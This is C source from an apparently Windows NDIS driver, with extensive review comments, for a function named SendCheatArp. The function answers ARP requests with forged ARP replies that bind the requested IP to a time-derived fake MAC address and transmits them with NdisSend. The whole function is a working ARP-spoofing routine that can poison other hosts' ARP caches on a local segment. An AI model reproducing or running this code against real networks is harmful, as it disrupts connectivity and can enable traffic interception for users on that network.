NdisSend


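/*
 * SendCheatArp - answer a received ARP frame with a forged ARP reply.
 *
 * Builds an Ethernet + ARP frame in non-paged memory and hands it to the
 * lower binding with NdisSend. The reply is addressed to the sender of the
 * received frame and claims that the IP address that frame asked about
 * (pARP->arp_tpa) is owned by a fabricated hardware address. The adapter's
 * own MAC is not used: the address is 0x00 followed by the first five bytes
 * of the current system time, so it differs from call to call.
 *
 * On the wire this shows up as ARP replies in which the Ethernet source and
 * the ARP sender hardware address agree, start with octet 00, and change
 * for every reply. The time-derived octets also disclose part of the local
 * system clock to the segment.
 * NOTE(review): a first octet of 0x00 marks the address as universally
 * administered, although it is made up here; it can coincide with a real
 * vendor-assigned address on the segment.
 *
 * Parameters:
 *   pAdapt    - adapter context; supplies the packet pool, buffer pool and
 *               binding handle used for the send.
 *   pARPFrame - Ethernet header of the received frame (only ether_shost is
 *               read).
 *   pARP      - ARP payload of the received frame. This is data from the
 *               network and is treated as untrusted.
 *
 * Returns nothing. Every failure (bad arguments, unexpected address
 * lengths, allocation failure) results in no frame being sent.
 *
 * NOTE(review): NdisDprAllocatePacket is documented for callers running at
 * DISPATCH_LEVEL - confirm that every caller satisfies this.
 * NOTE(review): nothing here frees pSysBuffer, pMyBuffer or MyPacket after a
 * successful hand-off; presumably PtSendComplete recognises
 * OriginalPkt == NULL and releases all three - verify, otherwise each call
 * leaks non-paged pool.
 */
VOID SendCheatArp(PADAPT pAdapt, struct ether_header* pARPFrame, struct ether_arp* pARP)
{
    NDIS_STATUS Status;      /* was UINT; the NDIS calls below report an NDIS_STATUS */
    PNDIS_PACKET MyPacket;
    PNDIS_BUFFER pMyBuffer;
    PUCHAR pSysBuffer;
    PSEND_RSVD SendRsvd;
    struct ether_header* eth;
    struct ether_arp* arp;
    LARGE_INTEGER systime;
    UINT i;
    const UINT FrameLength = sizeof(struct ether_header) + sizeof(struct ether_arp);

    if (pAdapt == NULL || pARPFrame == NULL || pARP == NULL)
    {
        return;
    }

    /*
     * The address fields below are copied with fixed Ethernet/IPv4 sizes,
     * while ar_hln/ar_pln are echoed from the received frame. Refuse frames
     * that advertise other lengths so the reply is never emitted with a
     * header that contradicts its own layout.
     */
    if (pARP->ea_hdr.ar_hln != ETHER_ADDR_LEN || pARP->ea_hdr.ar_pln != sizeof(ULONG))
    {
        return;
    }

    /* Take a packet descriptor from the adapter's send pool. */
    NdisDprAllocatePacket(&Status, &MyPacket, pAdapt->SendPacketPoolHandle);
    if (Status != NDIS_STATUS_SUCCESS)
    {
        return;
    }

    /* Backing store for the frame; non-paged because the miniport reads it. */
    pSysBuffer = (PUCHAR)ExAllocatePool(NonPagedPool, FrameLength);
    if (NULL == pSysBuffer)
    {
        NdisDprFreePacket(MyPacket);
        return;
    }

    /* Describe that memory with an NDIS buffer descriptor. */
    NdisAllocateBuffer(&Status, &pMyBuffer, pAdapt->BufferPoolHandle, pSysBuffer, FrameLength);
    if (Status != NDIS_STATUS_SUCCESS)
    {
        ExFreePool(pSysBuffer);
        NdisDprFreePacket(MyPacket);
        return;
    }

    NdisChainBufferAtFront(MyPacket, pMyBuffer);

    /* Keep the reply from being looped back to the local protocol stack. */
    NdisSetPacketFlags(MyPacket, NDIS_FLAGS_DONT_LOOPBACK);

    eth = (struct ether_header*)pSysBuffer;
    arp = (struct ether_arp*)(eth + 1);

    /*
     * Ethernet header. Every field of both headers is written below, so no
     * stale pool contents leave the machine even though the allocation is
     * not zeroed.
     */
    KeQuerySystemTime(&systime);
    eth->ether_type = htons(ETHERTYPE_ARP);
    eth->ether_shost[0] = 0x00;
    for (i = 1; i < ETHER_ADDR_LEN; i++)
    {
        /* first five bytes of the system time, in memory order */
        eth->ether_shost[i] = ((PUCHAR)&systime)[i - 1];
    }
    RtlCopyMemory(eth->ether_dhost, pARPFrame->ether_shost, ETHER_ADDR_LEN);

    /* ARP header: hardware/protocol types and lengths mirror the request. */
    arp->ea_hdr.ar_hrd = pARP->ea_hdr.ar_hrd;
    arp->ea_hdr.ar_pro = pARP->ea_hdr.ar_pro;
    arp->ea_hdr.ar_hln = pARP->ea_hdr.ar_hln;
    arp->ea_hdr.ar_pln = pARP->ea_hdr.ar_pln;
    arp->ea_hdr.ar_op = htons(ARPOP_REPLY);

    /* Sender: the fabricated MAC paired with the IP the request asked for. */
    RtlCopyMemory(arp->arp_sha, eth->ether_shost, ETHER_ADDR_LEN);
    RtlCopyMemory(arp->arp_spa, pARP->arp_tpa, sizeof(ULONG));

    /* Target: the requester's MAC (from the Ethernet header) and its IP. */
    RtlCopyMemory(arp->arp_tha, eth->ether_dhost, ETHER_ADDR_LEN);
    RtlCopyMemory(arp->arp_tpa, pARP->arp_spa, sizeof(ULONG));

    /*
     * NOTE(review): this writes the packet's private bookkeeping directly;
     * the intent appears to be a single-buffer chain - confirm against the
     * NDIS version the driver targets.
     */
    MyPacket->Private.Head->Next = NULL;
    MyPacket->Private.Tail = NULL;

    /* No originating packet or IRP is associated with this frame. */
    SendRsvd = (PSEND_RSVD)(MyPacket->ProtocolReserved);
    SendRsvd->OriginalPkt = NULL;
    SendRsvd->pIrp = NULL;

    NdisSend(&Status, pAdapt->BindingHandle, MyPacket);
    if (Status != NDIS_STATUS_PENDING)
    {
        /* Completed synchronously: run the completion handler ourselves. */
        PtSendComplete(pAdapt->BindingHandle, MyPacket, Status);
    }
}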
